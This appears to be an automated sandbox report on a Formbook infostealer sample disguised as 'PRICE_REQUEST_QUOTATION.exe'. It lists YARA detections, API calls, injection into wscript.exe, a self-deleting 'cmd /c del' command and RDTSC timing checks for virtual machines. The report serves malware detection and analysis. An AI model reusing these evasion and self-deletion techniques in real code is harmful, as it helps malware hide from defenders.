          Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004185D0 NtCreateFile,3_2_004185D0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00418680 NtReadFile,3_2_00418680
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00418700 NtClose,3_2_00418700
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004187B0 NtAllocateVirtualMemory,3_2_004187B0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004185CB NtCreateFile,3_2_004185CB
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041867A NtReadFile,3_2_0041867A
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004186FB NtClose,3_2_004186FB
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041872A NtClose,3_2_0041872A
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004187AA NtAllocateVirtualMemory,3_2_004187AA
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00A198F0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A19860
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19840 NtDelayExecution,LdrInitializeThunk,3_2_00A19840
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A199A0 NtCreateSection,LdrInitializeThunk,3_2_00A199A0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00A19910
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19A20 NtResumeThread,LdrInitializeThunk,3_2_00A19A20
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00A19A00
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19A50 NtCreateFile,LdrInitializeThunk,3_2_00A19A50
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A195D0 NtClose,LdrInitializeThunk,3_2_00A195D0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19540 NtReadFile,LdrInitializeThunk,3_2_00A19540
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A196E0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A19660
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00A197A0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19780 NtMapViewOfSection,LdrInitializeThunk,3_2_00A19780
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19FE0 NtCreateMutant,LdrInitializeThunk,3_2_00A19FE0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19710 NtQueryInformationToken,LdrInitializeThunk,3_2_00A19710
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A198A0 NtWriteVirtualMemory,3_2_00A198A0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19820 NtEnumerateKey,3_2_00A19820
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A1B040 NtSuspendThread,3_2_00A1B040
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A199D0 NtCreateProcessEx,3_2_00A199D0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A19950 NtQueueApcThread,3_2_00A19950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99840 NtDelayExecution,LdrInitializeThunk,17_2_04C99840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk,17_2_04C99860
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C995D0 NtClose,LdrInitializeThunk,17_2_04C995D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C999A0 NtCreateSection,LdrInitializeThunk,17_2_04C999A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99540 NtReadFile,LdrInitializeThunk,17_2_04C99540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_04C99910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C996D0 NtCreateKey,LdrInitializeThunk,17_2_04C996D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_04C996E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99A50 NtCreateFile,LdrInitializeThunk,17_2_04C99A50
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99650 NtQueryValueKey,LdrInitializeThunk,17_2_04C99650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_04C99660
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99FE0 NtCreateMutant,LdrInitializeThunk,17_2_04C99FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99780 NtMapViewOfSection,LdrInitializeThunk,17_2_04C99780
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99710 NtQueryInformationToken,LdrInitializeThunk,17_2_04C99710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C998F0 NtReadVirtualMemory,17_2_04C998F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C998A0 NtWriteVirtualMemory,17_2_04C998A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C9B040 NtSuspendThread,17_2_04C9B040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99820 NtEnumerateKey,17_2_04C99820
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C999D0 NtCreateProcessEx,17_2_04C999D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C995F0 NtQueryInformationFile,17_2_04C995F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99950 NtQueueApcThread,17_2_04C99950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99560 NtWriteFile,17_2_04C99560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99520 NtWaitForSingleObject,17_2_04C99520
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C9AD30 NtSetContextThread,17_2_04C9AD30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99A80 NtOpenDirectoryObject,17_2_04C99A80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99670 NtQueryInformationProcess,17_2_04C99670
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99A00 NtProtectVirtualMemory,17_2_04C99A00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99610 NtEnumerateValueKey,17_2_04C99610
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99A10 NtQuerySection,17_2_04C99A10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99A20 NtResumeThread,17_2_04C99A20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C997A0 NtUnmapViewOfSection,17_2_04C997A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C9A3B0 NtGetContextThread,17_2_04C9A3B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99760 NtOpenProcess,17_2_04C99760
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99770 NtSetInformationFile,17_2_04C99770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C9A770 NtOpenThread,17_2_04C9A770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99B00 NtSetValueKey,17_2_04C99B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C9A710 NtOpenProcessToken,17_2_04C9A710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C99730 NtQueryVirtualMemory,17_2_04C99730
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B485D0 NtCreateFile,17_2_00B485D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B48680 NtReadFile,17_2_00B48680
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B487B0 NtAllocateVirtualMemory,17_2_00B487B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B48700 NtClose,17_2_00B48700
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B485CB NtCreateFile,17_2_00B485CB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B486FB NtClose,17_2_00B486FB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4867A NtReadFile,17_2_00B4867A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B487AA NtAllocateVirtualMemory,17_2_00B487AA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4872A NtClose,17_2_00B4872A
          Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.269417802.000000000EABF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
          Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341516961.0000000000C5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
          Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs PRICE_REQUEST_QUOTATION.exe
          Source: PRICE_REQUEST_QUOTATION.exeVirustotal: Detection: 34%
          Source: PRICE_REQUEST_QUOTATION.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeFile read: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
          Source: PRICE_REQUEST_QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeProcess created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\nsn8CC7.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/2@9/5
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
          Source: Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeUnpacked PE file: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041603B push eax; ret 3_2_0041603C
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041B148 pushad ; ret 3_2_0041B14B
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004152B0 pushad ; retf 3_2_004152B8
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004105D2 push ebp; ret 3_2_004105D3
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_004156A7 push ss; ret 3_2_004156AA
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeCode function: 3_2_00A2D0D1 push ecx; ret 3_2_00A2D0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04CAD0D1 push ecx; ret 17_2_04CAD0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4603B push eax; ret 17_2_00B4603C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4B812 push eax; ret 17_2_00B4B818
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4B81B push eax; ret 17_2_00B4B882
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4B87C push eax; ret 17_2_00B4B882
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4B148 pushad ; ret 17_2_00B4B14B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B452B0 pushad ; retf 17_2_00B452B8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B405D2 push ebp; ret 17_2_00B405D3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B456A7 push ss; ret 17_2_00B456AA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_00B4B7C5 push eax; ret 17_2_00B4B818
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000B38614 second address: 0000000000B3861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000B389AE second address: 0000000000B389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 2244 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5540 Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000006.00000000.304126686.000000000DD44000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.66
          Source: explorer.exe, 00000006.00000000.286630230.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.313086176.000000000374F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.276302180.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000006.00000000.290796557.0000000008C5E000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
          Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000000.298466156.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]17_2_04C7AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]17_2_04C7AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]17_2_04C5C600
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]17_2_04C5C600
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]17_2_04C5C600
